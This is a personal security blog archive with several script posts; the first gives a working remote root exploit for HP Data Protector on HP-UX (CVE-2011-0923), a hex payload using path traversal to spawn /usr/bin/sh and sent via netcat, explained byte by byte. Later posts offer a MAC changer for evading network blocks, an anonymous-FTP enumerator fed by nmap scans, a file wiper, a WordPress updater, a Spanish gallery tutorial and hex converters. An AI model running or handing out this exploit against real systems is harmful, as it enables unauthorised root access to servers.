H4CKarandas » c0de

HP Data Protector Remote Shell for HPUX

Ch0ks — Fri, 05 Aug 2011 04:13:31 +0000

In many pentest that I have done, HPUX is one of the more commons UNIX OS that I found. It is a strong operating system running in a robust hardware, and when I got to know more about the Lights Out functionality I just fall in love. Al thought many companies uses it for running their main part of their business I have found the they don’t pay much attention on it’s security so it’s common to find production servers without patches or even running applications on insecure protocols like Telnet, FTP or even rlogin.

Since HPUX has been around for a long time and HP was concerned about its security he created the project Bastile for HPUX. I had used it to secure servers and I can say that it’s great! You have to be really careful because it closes a lot of stuff and it may, no sorry, it will broke the connectivity with your oldest applications. ( by the way, it moves the users hashes to the /tcb/files/auth/ folder ). This doesn’t mean you just run tomorrow, apply the Bastille on your servers and forget about them… YOU ALSO NEED TO PATCH THE SERVER -CONSTANTLY-

So this week I was working in a Pentest and one of the main objectives was this HPUX 11.11 server, with 10 open ports and Bastille installed, it wasn’t looking so good. Looking around I found that Data Protect has this nasty vulnerability and that fdisk has created a PoC for this Zero Day but in Windows. So with a lot of help from c4an (he ported this tool to the Metasploit Project that you can see in his blog) the server was compromised with root…. w00t w00t!

So this is the code and I share it ONLY FOR EDUCATIONAL PURPOSES. I encourage you not to use it on servers that you don’t own. You can also download it from my Hacking Projects section

#!/bin/bash # Exploit Title: HP Data Protector Remote Shell for HPUX # Date: 2011-08-02 # Author: Adrian Puente Z. # Software Link:http://www8.hp.com/us/en/software/software- # product.html?compURI=tcm:245-936920&pageTitle=data-protector # Version: 0.9 # Tested on: HPUX # CVE: CVE-2011-0923 # Notes: ZDI-11-055 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/ # Document.jsp?objectID=c02781143 # # Powered by Hackarandas www.hackarandas.com # Reachme at ch0ks _at_ hackarandas _dot_ com || @ch0ks # Lots of thanks to David Llorens (@c4an) for all the help. # Ported to HPUX from fdisk's (@fdiskyou) Windows version. # Windows version: http://www.exploit-db.com/exploits/17339/ # # Shouts to shellhellboy, r3x, r0d00m, etlow, # psymera, nitr0us and ppl in #mendozaaaa #


[ $# -lt 3 ] && echo -en "Syntax: `basename ${0}` 
 \n\n`basename ${0}` 10.22.33.44 5555 id \nX15 [12:1] uid=0(root) gid=0(root)

" && exit 0

HOST=`echo ${@} | awk '{print $1}'` PORT=`echo ${@} | awk '{print $2}'` CMD=`echo ${@} | sed 's/'$HOST'.*'${PORT}'\ \ *//g'` SC="" SC=${SC}"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d" SC=${SC}"\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68" SC=${SC}"\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d" SC=${SC}"\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30" SC=${SC}"\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d" SC=${SC}"\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30" SC=${SC}"\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f" SC=${SC}"\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" SC=${SC}"\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00" SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" SC=${SC}"\x00\x00\x00\x00\x00\x00\x00\x00\x00" SHELLCODE=${SC} ( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

This script is in Bash and can run in any Linux like Backtrack or in Windows using Cygwin and this is how it works:

The shellcode is 168 bytes and is injected directly on the port. The first 8 bytes of the 104 bytes of this shellcode is part of the protocol where we use the flag “C 20″ to tell Data Protect (I found that if we manipulates this value other things can be accomplished even writing directly to / ) to perform the vulnerable function that allows remote connections and execute files within it’s local bin directory.

"\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d" "\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68" "\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d" "\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30" "\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d" "\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30" "\x74\x2d\x00\x20\x30\x00\x20\x30\x00"

but if we use the Directory Path Traversal technique we can execute any binary within the file system. The next part was tricky, I can execute any command but I am unable to pass arguments directly to it, so after some debug I found I can spawn a /usr/bin/sh closing it with some nullbytes to get the complete 168 bytes and if I concatenates the command to execute it will pass directly to the shell and execute it with the user’s environment variables, in this case root, and returns us the output.

"\x20\x2e\x2e\x2f\x2e\x2e\x2f" "\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e" "\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00"

So at the end I get this to work doing this:

( echo -en ${SHELLCODE} ; echo ${CMD} ) | nc -w1 ${HOST} ${PORT}

The Netcat helps me to transports the shellcode to the port and it returns the output. It simply works.

So special thanks to fdisk for the PoC and David Llorens for the useful brainstorming, he also ported this tool to the Metasploit Project that you can see in his blog.

Adrian Puente Z.

Updating your WordPress Blog in a blink!

Ch0ks — Wed, 30 Mar 2011 03:49:18 +0000

I know, I know… WordPress already has an option to update your blog with one click… but I love to use my SSH and I don’t trust FTP connections, so here is my manual solution for this. I hope you find it useful.

ssh myblog.com
./updateblog.sh
exit

That’s it, pretty fancy uh? This is the code for this script:

#!/bin/bash
# Script by Adrian Puente Z..
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

# This is the absolute PATH to a working directory.
UPGRADEPATH="/home/user/mytempdir/"
# Where the Blog is installed.
BLOGPATH="/home/user/complete/path"
# The complete URL to the blog.
BLOGURL="www.myblog.com/complete/path"
# For spanish version use this line.
NEWWP=`curl -q http://es.wordpress.org/ 2>/dev/null| grep download-tar | cut -d‘"’ -f4`
# For english version use this line
#NEWWP="http://wordpress.org/latest.tar.gz"

echo -n "Downloading ${NEWWP}, is this ok? [y/N] "
read -n 1 OK
echo
if [ ${OK} == "n" ]
then
echo Exiting…
exit 0
fi

cd ${UPGRADEPATH}
echo Downloading new WP…
wget ${NEWWP} -O- | tar zxf –
if [ $? -ne 0 ]
then
echo "Problem found downloading latest release."
echo "Exiting…"
exit 1
fi

echo Deleting old wp-admin and wp-includes..
echo -n "is this ok [y/N] "
read -n 1 OK
echo
if [ ${OK} == "n" ]
then
echo Exiting…
exit 0
fi

rm -fr ${BLOGPATH}/wp-admin
rm -fr ${BLOGPATH}/wp-includes

echo -n "Copying new files…i "
cp -r wordpress/* ${BLOGPATH}
rm -fr wordpress/
echo Done
echo Now go to this URL to update database..
echo -e "${BLOGURL}/wp-admin/upgrade.php"
echo Bye.
exit 0

You just need to change the variables according to your blog needs, each one is commented to best understanding and don’t forget to give execution access. This script has only been tested on Linux and you should only keep it inside your home not in the www or http folder to avoid that someone read it.

You can download it here under your own risk and don’t forget to check my other projects here.

Any comment or doubt leave me a comment and I will try to reply it asap.

Adrian Puente Z.

Adrian Puente Z., Hackarandas, ssh, blog, update, wordpress

Can I reach it? Small Script for Network Connectivity Test

Ch0ks — Mon, 23 Aug 2010 15:00:30 +0000

I made this script so I can replicate a network connection test to some host. It’s really small but it works in all the cases and has some nice features as internal and external IP detection. It works in Linux, ideal for a pentest using Backtrack.

Here is the Bash code.

#!/bin/bash
# Script by Adrian Puente Z..
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

[ `id -u` -ne 0 ] && echo "Only root can do that! sudoing…"
if [ "$EUID" != 0 ]; then sudo `which $0` $@; exit; fi

[ $# -eq 0 ] && echo "Syntax: `basename $0` " && exit 0

# Setting the host from the first argument.
HOST=$1
# Maximun hops for traceroute.
HOPS=15
# Maximun packet for ping.
PCOUNT=3

IFACE=`route -vn | grep UG | sed ‘s/\ \ */\ /g’ | cut -d‘ ‘ -f8`
INTIP=`ifconfig ${IFACE} | grep "inet addr" | tr ‘ ‘ ‘:’ | cut -d‘:’ -f13`

# Choose the method you like most.
#EXTIP=`lynx –source http://www.whatismyip.org`
#EXTIP=`wget -q http://www.whatismyip.org -O-`
EXTIP=`curl -q http://www.whatismyip.org 2>/dev/null`

echo "— Internal IP: ${INTIP} —"
echo "— External IP: ${EXTIP} —"
echo -e "\n— Pinging…\n"
ping -c ${PCOUNT} ${HOST}
echo -e "\n— Doing traceroute…\n"
traceroute -m ${HOPS} ${HOST}
echo -e "\n— Checking open ports…\n"
nmap -sSV -PN ${HOST}
echo -e "\n— Test finished…"

You can change the parameters to fit your needs.

Here is an example.

–.^ (ch0ks@xipe)*(18:30:27)*(bin) ^.–
-=:)> checkconnection.sh www.google.com
Only root can do that! sudoing…
— Internal IP: 192.168.11.5 —
— External IP: A.B.C.D —

— Pinging…

PING www.l.google.com (74.125.95.106) 56(84) bytes of data.
64 bytes from iw-in-f106.1e100.net (74.125.95.106): icmp_seq=1 ttl=51 time=67.2 ms
64 bytes from iw-in-f106.1e100.net (74.125.95.106): icmp_seq=2 ttl=51 time=65.8 ms
64 bytes from iw-in-f106.1e100.net (74.125.95.106): icmp_seq=3 ttl=51 time=66.3 ms

— www.l.google.com ping statistics —
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 65.895/66.490/67.223/0.626 ms

— Making traceroute…

traceroute to www.google.com (74.125.95.103), 15 hops max, 60 byte packets
1 leviatan (192.168.11.250) 1.385 ms 1.465 ms 1.492 ms
2 201.159.131.205 (A.B.C.D) 5.463 ms 5.511 ms 5.519 ms
3 192.168.1.98 (192.168.1.98) 5.648 ms 5.710 ms 5.970 ms
4 customer-58.xertix.com (201.159.136.58) 6.000 ms 6.067 ms 6.208 ms
5 na-200-78-191-129.static.avantel.net.mx (200.78.191.129) 8.204 ms 8.264 ms 8.456 ms
6 dial-200-39-225-125.zone-1.ip.dial.net.mx (200.39.225.125) 8.617 ms 6.470 ms 6.654 ms
7 pos1-0.cr02.mca01.pccwbtn.net (63.218.161.69) 20.646 ms 20.614 ms 20.039 ms
8 TenGE12-1.br02.dal01.pccwbtn.net (63.218.22.82) 303.761 ms * *
9 google.tenge11-4.br02.dal01.pccwbtn.net (63.218.23.118) 33.544 ms 34.331 ms 34.501 ms
10 72.14.233.85 (72.14.233.85) 61.329 ms 72.14.233.77 (72.14.233.77) 61.388 ms 61.520 ms
11 216.239.47.121 (216.239.47.121) 69.114 ms 69.800 ms 69.511 ms
12 209.85.253.173 (209.85.253.173) 68.657 ms 209.85.255.223 (209.85.255.223) 67.482 ms 209.85.253.173 (209.85.253.173) 68.568 ms
13 209.85.241.29 (209.85.241.29) 66.212 ms 66.150 ms 66.263 ms
14 iw-in-f103.1e100.net (74.125.95.103) 65.803 ms 65.757 ms 65.991 ms

— Checking open ports…

Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-20 18:31 CDT
Warning: Hostname www.google.com resolves to 6 IPs. Using 74.125.95.104.
Interesting ports on iw-in-f104.1e100.net (74.125.95.104):
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp?
80/tcp open http Google httpd 2.0 (GFE)
113/tcp closed auth
443/tcp open ssl/http Google httpd 2.0 (GFE)
Service Info: OS: Linux

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 127.81 seconds

— Test finished…

I hope you liked and helped. You can also visit other scripts and projects I have here. And please, leave your comments.

Adrián Puente Z.

Adrian Puente Z., Hackarandas, Security, Network Test, ping, traceroute

Uncomplicated File Wipe for *NIX

Ch0ks — Wed, 18 Aug 2010 01:59:02 +0000

We needed to guarantee to one of our customers that a file will be securely deleted. Since the server was a HPUX Unix and we can’t compile nor install new applications, I managed to write this script to wipe the file.

The file is overwritten 7 times as the US Department of Defense clearing standard DoD 5220.22-M specifies and renamed another 7 times before being deleted. It is written for the KSH shell as many UNIX has it by default. It doesn’t run in bash but you can edit it to fit your needs.

Here is the code:

#!/usr/bin/ksh
# Script by Adrian Puente Z..
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

# US Department of Defense clearing standard DOD 5220.22-M (ECE)
PASES=7
# Device to overwrite the file.
# Can be:
# /dev/random
# /dev/urandom
# /dev/zero (less secure, overwritten with zeros)
RANDEV=/dev/urandom
NAME=$$
COUNT=0
FILE=$1

if [[ $# -eq 0 ]];then
print "Syntax: $0 "
exit 1
fi

if [[ ! -f $FILE ]]
then
print "File $FILE doesn’t exists"
exit 1
fi

if [[ ! -w $FILE ]]
then
print "Can’t write on file $FILE"
exit 1
fi

SIZE=$(ls -l $FILE | cut -d‘ ‘ -f5)

print -n "About to wipe file: $FILE are you sure? \"N/y\": "
read answer
print ""

if [[ ! ( $answer = ‘y’ || $answer = ‘Y’ ) ]]
then
print "Command canceled."
exit 0
fi

while [[ $COUNT -lt $PASES ]];do
(( COUNT += 1 ))
print "Pass number: $COUNT"
dd if=$RANDEV of=$FILE bs=$SIZE count=1
done

COUNT=0
echo "Renaming…"

while [[ $COUNT -lt $PASES ]];do
(( COUNT += 1 ))
(( NAME += "$NAME$COUNT" ))
mv -v $FILE $NAME
FILE=$NAME
done

rm -v $FILE
FILE=$1
echo File: $FILE deleted.
exit 0

The syntax is simple:

–.^ (ch0ks@xipe)*(20:38:05)*(~) ^.–
-=:)> uncomplicatedwipe.ksh
Syntax: uncomplicatedwipe.ksh

You can follow this commands to test the script:

hexdump /dev/urandom > foo.txt
#after some seconds press CTRL+C

Now we wipe the file

–.^ (ch0ks@xipe)*(20:36:00)*(tmp) ^.–
-=:)> uncomplicatedwipe.sh foo.txt
About to wipe file: foo.txt are you sure? "N/y": y

Pass number: 1
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 4.01637 s, 3.9 MB/s
Pass number: 2
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.87637 s, 4.0 MB/s
Pass number: 3
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 5.451 s, 2.8 MB/s
Pass number: 4
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 4.48904 s, 3.4 MB/s
Pass number: 5
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.88731 s, 4.0 MB/s
Pass number: 6
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.98379 s, 3.9 MB/s
Pass number: 7
1+0 records in
1+0 records out
15477760 bytes (15 MB) copied, 3.2128 s, 4.8 MB/s
Renaming…
`foo.txt‘ -> `69257′
`69257‘ -> `761829′
`761829‘ -> `8380122′
`8380122‘ -> `92181346′
`92181346‘ -> `1013994811′
`1013994811‘ -> `11153942927′
`11153942927‘ -> `122693372204′
removed `122693372204‘
File: foo.txt deleted.

In the next release I will make a recursive version for directories and you can visit my other projects here.

Troubleshoot: Some Unix systems doesn’t have /dev/urandom device so you can play with the RANDEV variable to use the one you have.

Update: Some versions of HPUX doesn’t have /dev/[u]random so you can use as a desperate alternative the /dev/zero device. I found in a forum that some versions of HPUX doesn’t have the /dev/zero device so you can create it with this command:

#!/bin/sh

# major/minor for HPUX 11.X
mknod /dev/zero c 3 4
chown bin:bin /dev/zero
chmod 666 /dev/zero

Adrián Puente Z.

hackarandas, wipe, Adrian Puente Z., security, Secure Delete, unix, security, seguridad, ksh code

Fast MAC Address Changer in Linux

Ch0ks — Fri, 02 Apr 2010 20:01:49 +0000

When you are making a pentest sometimes you need to be sneaky and have some tricks in your arsenal to cloak yourself in the network. But some sysadmins are skillfull in their incident response and, sometimes (not many in my experience) they found you and try to block your access creating some ACLs for the IP you are using, maybe for your MAC Address.

This script runs on linux and helps you changing your MAC Address in a blink of an eye, this is how it works: you invoke the command and automatically see if you are root, if not it sudo itself to get the needed priviledges, generates a new random mac and installs it in the interface.

-=:)> changemacrandom.sh

For example:

-=:)> changemacrandom.sh eth0
Only root can do that! sudoing…
eth0 Link encap:Ethernet HWaddr 00:15:c5:3d:e9:82
Interface eth0 has new mac:
eth0 Link encap:Ethernet HWaddr 70:e7:84:ca:b2:c5
Restart dhcp client to get a new IP.

The code is really simple:

#!/bin/bash
# Script by Adrian Puente Z. apuente _AT_ hackarandas _dot_ com
# Powered by Hackarandas www.hackarandas.com
# Licensed by GNU GPLv3
# http://www.gnu.org/licenses/gpl-3.0.txt

[ $# -eq 0 ] && echo "Sintax: `basename $0` " && exit 0

[ `id -u` -ne 0 ] && echo "Only root can do that! sudoing…"
if [ "$EUID" != 0 ]; then sudo `which $0` $1; exit; fi

INT=$1

function gennewmac
{
hexdump /dev/urandom | head -3 |\
cut -d‘ ‘ -f2 | while read -n 2 i
do echo -n $i:
done | sed ‘s/::/:/g;s/:$//g’
}

if ifconfig ${INT} 2> /dev/null 2>&1 | head -1
then
NEWMAC=`gennewmac`
sleep 3
if ifconfig ${INT} down hw ether ${NEWMAC} 2>/dev/null
then
echo Interface ${INT} has new mac:
ifconfig ${INT} 2> /dev/null 2>&1 | head -1
ifconfig ${INT} up
echo Restart dhcp client to get a new IP.
else
echo "Error changing MAC to ${NEWMAC}!"
echo "Try again with the same command."
exit 1
fi
else
echo "Interface ${INT} doesn’t exists!"
exit 1
fi
exit 0

You can download the script or check other projects i’ve made.

So that’s it. Leave your comments please and happy hacking!

Adrián Puente Z.

hackarandas, hacker, mac changer, Adrian Puente Z., Linux, backtrack, pentest

Habemus Galería

Ch0ks — Thu, 15 Mar 2007 22:18:42 +0000

Pues ya por fin pude crear la galería y es que quería ponerla de cierta forma en particular, ya saben, soy de esos que si no cuestan uno y la mitad del otro no me sabe. Quería poner la galería de forma que no usara un servicio externo como Flicker, que se crearan los thumbs de forma dinámica y que no tuviera que usar el MySQL.

Encontré el Tiny Web Gallery que sobrepasó mis expectativas, aparte de que es realmente fácil de utilizar y administrar. ¿No te ha pasado que tienes cientos de pics pero el problema es que hiciste respaldo en multiples directorios en diferentes partes de tu sistema? En fin, hice un script que me automatiza la creación de la galeria escalando las imágenes a 800×600, ordenándolas y etiquetándolos con una leyenda que describa la situación del evento, para muestra un botón:

En mi caso me bajé el XAMPP que es un excelente proyecto de que incluye Apache, PHP 4 o 5 y MySQL extremadamente amigable para administrar. Vamos a descargarlo aqui y seguimos las instrucciones, es importante cambiarle las contraseñas a los servicios de XAMPP para un servidor en producción sino luego no chilles si te cambian la página de inicio. Recuerda que el TWG funciona con PHP4 al menos yo no lo he probado con el PHP5 asi que cambiamos con el siguiente comando:

sudo /opt/lampp/lampp security sudo /opt/lampp/lampp php4 sudo /opt/lampp/lampp restart

Ahora descargamos el TWG de aqui lo descargamos en /tmp y lo ponemos en la siguiente carpeta /opt/lampp/htdocs. Es importante cambiarle el grupo y darle permisos de escritura al apache pues de otra forma no podremos administar e TWG.

cd /opt/lampp/htdocs/ unzip -a /tmp/twg*.zip mv twg* galeria chgrp -R nobody galeria chmod -R g+w galeria

Listo! ya tenemos instalado el Apache con el PHP4 y el TWG en nuestra máquina y podemos verlo andar en la siguiente direccion http://localhost/galeria . Debes de poder ver la galería de prueba, cosa que queremos pues significa que el “juguete” está andando, después puedes borrar esta galeria para sólo dejar la tuya. Ahora vamos a administrarla, RECUERDA CAMBIAR LOS PERMISOS. entramos a la siguiente dirección http://localhost/galeria/admin/index.php con el usuario admin y la contraseña twg_admin y nos llevará a la primera página de administración donde no exhorta cambiar el passwd cosa que recomiendo ampliamente así como cambiar el login del usuario por defecto por uno menos convencional, ya sabes, vivo en la paranoia.

Para irnos directo: en el menú izquierdo vemos una liga que dice “Configure TWG” la pulsamos y en la opción “Enable session caching of directorys and files” le damos false. Cuando estamos actualizando la galeria es bueno tenerlo en false así regenera el caché y podemos ver la galeria terminada. Cuando acabemos no olvides poner en true esta opción, es mucho mas óptimo tenerlo habilitado cuando ya se encuentra en producción. Las imágenes se guardan en carpetas en la siguiente dirección /opt/lampp/htdocs/galeria/pictures Cada galeria le puedes poner una carpeta y dentro de cada carpeta puedes poner una imagen llamada folder.png para que sea el ícono de la Galeria así como un archivo foldername.txt para la descripción donde puedes poner HTML y hacerlo mas “eye candy“.

Vamos al famoso Script que nos automatizará la tarea de procesamiento de imágenes. Es importente tener el comando convert del Imagemagick. El script doGallery

#!/bin/bash
# Script hecho por Adrian Puente.

if [ $# -lt 2 ]
then
        echo -e "Sintaxis: `basename ${0}` [Prefix Pics] ["Desc"]"
        echo -e "Ejemplo: `basename ${0}` navidad.familia.2007 \\"Navidad con la Familia 2007\\".\\n"
        echo -e "Es importante poner las descripciones con espacios entre comillas."
        echo -e "Terminando el script una carpeta 800x600 contendra las imagenes procesadas."
        exit 0
fi

[ -f PROCESADO.TXT ] \&\& cat PROCESADO.TXT \&\& echo "Borrar el archivo PROCESADO.TXT" \&\& exit 

PREF=${1}
DESC=${2}
OK="\\033[5;32;1mHECHO\\033[0m"
NO="\\033[5;31;1mERROR\\033[0m"

[ ! -d 800x600 ] \&\& mkdir 800x600
# Renombramos las pics para mayor comodidad.
CTR=0;
for i in `ls -1 *.jpg *.JPG`
do
        if [ ${CTR} -lt 10 ]
        then
                NUM=00${CTR}
        else if [ ${CTR} -lt 100 ]
        then
                        NUM=0${CTR}
                else
                        NUM=${CTR}
                fi
        fi
        CTR=`expr ${CTR} + 1`
        echo -en "Convirtiendo ${i} --> ${PREF}-${NUM}.jpg "
        convert ${i} -scale 800x600 -fill white \\
                     -box \\#00000080 -gravity South \\
                     -pointsize 25 -annotate +0+5 "${DESC}" \\
                     800x600/${PREF}-${NUM}.jpg \&\& echo -e [${OK}] || echo -e [${NO}]
done

echo ${DESC} > 800x600/foldername.txt
echo -e "Directorio procesado para galeria el "`date +%F` > PROCESADO.TXT

El script te crea un archivo foldername.txt con la descripción que escogimos que es compatible con el TWG, también crea un archivo llamado PROCESADO.TXT que guarda la fecha en que esa carpeta fue procesada para no tener múltiples instancias de las carpetas procesadas. Ahora renombramos la carpeta 800×600 con un nombre que describa la situación, no sé, mi_cumple_2007, cuando termino restauro la opción del cache y en mi caso sincronizo los directorios con rsync, así puedo tener la galeria “en desarrollo” en mi máquina y cuando queda como quiero la subo, así tengo respaldo y no consumo el ancho de banda de mi site, ok muy ñoño pero no hay porqué ser ineficientes.

rsync --progress -avz -e ssh /opt/lampp/htdocs/galeria usuario@sitioweb:camino/a/los/htdocs

Si tienes algún problema extraño recuerda los permisos . En mi caso mi usuario y grupo en el sitio web es diferente al que tengo en mi máquina así que es bueno verificar los permisos de los grupos. Si quieres aumentarle la seguridad a tu sitio cambia el nombre de la carpeta admin por algún nombre difícil de adivinary accesa por la misma carpeta /index.php. Listo! la galeria ha sido creada. Enjoy

La galería de este su Blog es: http://www.hackarandas.com/galeria

Adrián Puente Z.

Hex 2 ASCII y viceversa

Ch0ks — Tue, 13 Feb 2007 19:10:23 +0000

He estado jugando un poco con redes inalámbricas y cuando logras romper alguna de 64 bits la llave te sale en Hexadecimal. Se me ocurrió que a lo mejor podría significar algo en ASCII asi que pensé en hacerme un pequeño script para convertirlo rápidamente. Encontrar un ejemplo práctico fue difícil asi que comparto este script para el deleite de otro g33k.

ascii2hex.pl

#!/usr/bin/perl
# Script editado por Adrian Puente Z.

use strict;
use warnings;

if ( $#ARGV == -1 )
{
print "Sintaxis: ascii2hex.pl [cadena ASCII]\\n";
exit;
}

my $testchars = $ARGV[0];
my $hexchars = ”;
foreach my $c (split(//,$testchars)) {
$hexchars .= sprintf "%x", ord($c);
}
print "$hexchars\\n";

Este Script hace lo contrario pero con otra aproximación:

hex2ascii.pl

#!/usr/bin/perl
# Script editado por Adrian Puente Z.

use strict;
use warnings;

if ( $#ARGV == -1 )
{
print "Sintaxis: hex2ascii.pl [cadena HEX]\\n";
exit;
}

my $s = $ARGV[0];
$s =~ s/://g;
$s =~ s/ //g;
my $l=length $s;
my @a=pack "H$l",$s;
print "@a\\n"

El truco del hex2ascii es que cuando tienes una cadena de tipo AE:34:DF:12 quita los caracteres : y lo convierte con la función pack de perl. Es cosa de checar la documentación para poder cambiar de otros formatos como binario a ASCII o HEX.

Ah, y no, no significan nada en ASCII, los que yo encontré. Normalmente en los routers 2WIRE de Prodigy tienen una clave en la parte inferior del dispositivo que, por lo que he visto, son siempre números facilitando mucho el rompimiento de la llave de la red.

Adrián Puente Z.

La chinche del FTP.

Ch0ks — Sat, 27 Jan 2007 08:04:01 +0000

Imaginemos que eres sysadmin de una empresa con una red clase B, tus becarios están en exámenes finales, te acaba de llegar una notificación de la BSA amenazándote de una auditoría de software y encima es cierre y contabilidad te tiene azorado con preguntas repetitivas de los usaurios (no, no está mal escrito).

Obvio no tienes el tiempo de revisar cuales son los espontáneos con servicios arriba compartiendo MP3s, warez y pr0n (lo peor es que no te avisan por ser el sysadmin).

Este pequeño script en perl te permite automatizar la búsqueda de información dentro de servidores FTP sin tener que estar pegado al cliente.

#!/usr/bin/perl -w
#
# Script hecho por Adrián Puente Z.
# Script hecho para Sm4rt Security Services
# Dudas y comentarios a:
# adrian [AT] sm4rt.com
# ch0ks [AT] hackarandas.com
#
# Este script recibe los parámetros de usuario, contraseña
# y host (IP o nombre) por línea de comando y se conecta
# al host creando un archivo con el listado del directorio
# raiz y muestra una salida con el estatus del proceso.

use Net::FTP;

if ( $#ARGV != 2 )
{
print "Sintáxis: ftpdirgrepable.pl [Usuario] [Password] [Host] \\n";
exit;
}

my $username = $ARGV[0];
my $password = $ARGV[1];
my $host = $ARGV[2];
my $directory="/";
my $newerr = 0;

push @ERRORS, "$host\\t$username\\t$password";

$ftp=Net::FTP->new($host,Timeout=>60) or $newerr=1;
push @ERRORS, "\\tno_conexion" if $newerr;
myerr() if $newerr;
push @ERRORS, "\\tsi_conexion";

$ftp->login($username,$password) or $newerr=1;
push @ERRORS, "\\tno_login" if $newerr;
$ftp->quit if $newerr;
myerr() if $newerr;
push @ERRORS, "\tsi_login";

@files=$ftp->dir or $newerr=1;
push @ERRORS, "\\tno_dir" if $newerr;
myerr() if $newerr;
push @ERRORS, "\\tsi_dir";

if ( $newerr != 1 )
{
open(DAT,">ftpdir-".$username.":".$password."_AT_".$host.".txt") || die("Error al abrir el archivo");
foreach(@files) { print DAT "$_n"; }
close(DAT);
}

$ftp->quit;
myerr();

sub myerr {
print @ERRORS;
print "n";
exit 0;
}

Esto lo podemos integrar a una salida de Nmap procesada de forma que sólo nos devuelva las IPs de las máquinas.Con este comando obtenemos una lista de IPs ordenaditas y sin repetirse con un puerto 21 (ftp) abierto a partir de un scaneo Nmap con una salida tipo gnmap.

grep -e ‘Ports:.*21/open’ *.gnmap | awk ‘{print $2}’ | sort -n | uniq > lst.IPs.txt

Y para integrar nuestro script usamos el siguiente comando:

for i in `cat lst.IPs.txt` ; do ftpdirgrepable.pl anonymous algo@algo.com ${i} ; done

Terminado el comando nos generará varios archivos con el contenido del servidor y el directorio raiz. Para muestra un botón:

-=:)> ftpdirgrepable.pl anonymous algo@algo.com kernel.org
kernel.org anonymous algo@algo.com si_conexion si_login si_dir
-=:)> cat ftpdir-anonymous:algo@algo.com_AT_kernel.org.txt
drwxrwx— 2 536 528 4096 May 21 2001 for_mirrors_only
drwx—— 2 0 0 16384 Oct 02 2005 lost+found
drwxrwsr-x 9 536 536 4096 Aug 21 23:21 pub
lrwxrwxrwx 1 0 0 1 Oct 03 2005 usr -> .
lrwxrwxrwx 1 0 0 10 Oct 03 2005 welcome.msg -> pub/README

Si vemos bien podemos observar que tiene una salida que nos permite aplicar un filtro con grep y al estar separado por tabs lo podemos redirigir a un archivo csv y abrirlo en excel.

A mi me sirvió mucho en el último pentest, sólo hubo que descartar los servidores cuyo contenido tenía un directorio JetDirect para descartar las impresoras. Puedes descargarlo de aqui.

Adrián Puente Z.